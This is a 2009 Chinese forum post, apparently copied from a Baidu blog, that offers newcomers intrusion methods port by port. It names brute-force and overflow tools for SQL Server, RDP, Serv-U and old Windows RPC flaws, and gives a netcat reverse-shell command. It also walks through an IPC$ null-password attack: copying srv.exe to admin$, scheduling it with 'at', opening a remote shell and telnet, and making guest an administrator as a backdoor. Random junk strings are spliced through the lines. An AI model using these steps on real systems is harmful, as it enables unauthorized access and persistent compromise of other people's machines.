广西经贸职业技术学院论坛

标题: 各个端口入侵方法 [打印本页]
作者: 月中水    时间: 2009-10-16 03:00
标题: 各个端口入侵方法
来源:hi.baidu
) ]# S7 w; O3 t% c$ X. L$ ?希望对新手入侵有帮助! 2 `! M8 [9 B# j) D1 T; ]; t6 u5 z
  1. 1433端口入侵
! M) d  }+ r" p) `/ k3 q9 z  scanport.exe 查有1433的机器; U9 E$ w7 I( n
  SQLScanPass.exe 进行字典暴破(字典是关键)
+ B+ l( D3 U" y& T6 `  最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。# R( j* q/ t" E% t- s
  nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
9 _/ p. p9 r1 Z4 P5 E% ~  (以上反向的,测试成功)
4 {( L% H7 W* f, n  sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
1 h5 G! h& E, ?$ m  2. 4899端口入侵
! V7 ?/ d& M  Y& H  用4899过滤器.exe,扫描空口令的机器
2 r$ n1 i" R: A( J! @( B  3. 3899的入侵; x! N* l! ?) ~: |
  对很早的机器,可以试试3389的溢出(win3389ex.exe)
) d; p8 a' K! b! U5 j+ o  对2000的机器,可以试试字典暴破。(tscrack.exe)5 \1 {2 V+ D9 J/ M$ p
  4. 80入侵
/ ^+ d2 ~5 W: A" I5 M0 s  M  对sp3以前的机器,可以用webdav入侵;  Q- F, w% L" ~
  对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
! ]  @  t. I$ s4 p- ~% P  可以利用SQL进行注入。(啊D的注入软件)。
8 U: [2 {" H& K" q% M% }4 [  5. serv-u入侵(21端口)
/ |% Y" B4 @# n+ y  对5. 004及以下系统,可用溢出入侵。(serv5004.exe)/ m: A7 u, [' i
  对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
5 r7 i9 g$ H" z- X& E- ]: I  对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)6 G3 U+ x+ z9 j+ X* p! m1 b
  输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
' T1 n$ x  [% c0 I  6. 554端口
% n* q0 y* ?. M  q  用real554.exe入侵。
  R, Q$ [) y+ v* K- p. \+ J  7. 6129端口
6 q8 B2 q6 P: `) e6 z  h0 H# v  用DameWare6129.exe入侵。
$ x) z4 D2 h$ q6 C3 _" Z& \  8. 系统漏洞
" R( K' B8 n5 w0 `6 s& a  利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。
% w# [* }8 o4 w5 I$ t9. 3127等端口
1 @# E8 H0 {4 W+ `" V/ a- k. I% I* H$ f$ T1 F
  可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
* `( Y/ g$ b8 _" Z3 U. s  10. 其他入侵
) q% s5 S- {/ K# r8 u, h) c  利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
4 K/ Q* |% N$ {6 n& C. |" y% O
3 u# b1 }" S& [5 V                              经典IPC$入侵: I6 K7 V- D2 Z9 g, j4 w
7 O& L2 e6 K2 c5 L0 A) f
  1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"
) O1 K7 x5 h; \  这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
, a+ f- N0 `- }  2. C:\>copy srv.exe $">\\127.0.0.1\admin$# C& I2 C: t# M4 v* Z' D* K& P
  先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
6 p0 ?3 h* p6 @# X  3. C:\>net time file://127.0.0.1/
4 B, s1 l/ A* ^" Z# j8 ^  查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。. w( @9 D6 f9 T" r- K1 U
  4. C:\>at file://127.0.0.1/ 11:05 srv.exe
! {8 d) I5 W3 e2 C( v- y' z  用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
) K' i+ N. L0 |9 b8 W  5. C:\>net time file://127.0.0.1/
3 n" A1 n4 j" y3 L! J2 ]; k6 q  再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
7 n: M! _4 ~2 E8 D  6. C:\>telnet 127.0.0.1 99
9 V! I+ L4 Z8 [  这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。4 F+ |& b" E. ?
  虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了. O2 @1 S* |$ I0 }. A
  7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$
# a9 [3 u6 H4 B# g1 Z, H- \  用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
% }8 h) x; n0 h" z0 l. c& u+ i  8. C:\WINNT\system32>ntlm* @7 y2 Y, U3 P1 G8 z
  输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!4 S+ P3 G! c7 [# H
  9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组/ T4 j, Q+ z% g$ W' a3 O! F
  10. C:\>net user guest /active:yes
0 z  h3 I. Q5 H! Y) B; E  将对方的Guest用户激活" |9 i5 K; J; b5 J3 E) ]) |
  11. C:\>net user guest 1234+ [: b. E; J! T9 {5 C- E
  将Guest的密码改为1234,或者你要设定的密码6 |3 M* e6 b/ o) A3 y* G
  12. C:\>net localgroup administrators guest /add
, i% Q9 o" q/ T5 ?  将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)



欢迎光临 广西经贸职业技术学院论坛 (http://gxjmbbs.com/) Powered by Discuz! X3.2